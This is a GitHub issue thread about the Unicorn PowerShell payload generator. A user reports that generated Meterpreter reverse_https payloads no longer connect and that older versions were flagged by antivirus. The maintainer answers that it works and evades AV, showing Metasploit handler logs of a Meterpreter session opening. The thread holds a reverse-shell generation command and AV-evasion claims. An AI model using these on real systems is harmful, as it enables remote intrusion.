### ISSUE TITLE
Last Update (version 2.3.4) Not Work!

### ISSUE THREAD

**Issue by mekasama** [trustedsec/unicorn#21]
Hi Dear,

Since version 2.3.4 released, powershell_attack.txt Not Work!
I try this command:
python unicorn.py windows/meterpreter/reverse_https ip port
and convert .txt file to .bat file and run that, but powershell.exe don't open in target system (my local vm system) and listener don't receive every sessions!
In other hand this time, previous version catch by windows defender, kaspersky and norton AVs :(

**Comment by trustedsec** [comment]
Not sure what to tell you, it does work for me and does get around AV since it was updated to with 2.3.4.

[*] [2016.08.10-10:01:54] https://192.168.170.132:443 handling request from 192.168.170.142; (UUID: zbswzc2p) Encoded stage with x86/shikata_ga_nai

[10:10:55] TrustedSec MSF (s:1 j:1) exploit(handler) > [*] Meterpreter session 2 opened (192.168.170.132:443 -> 192.168.170.142:50391) at 2016-08-10 10:01:55 -0400
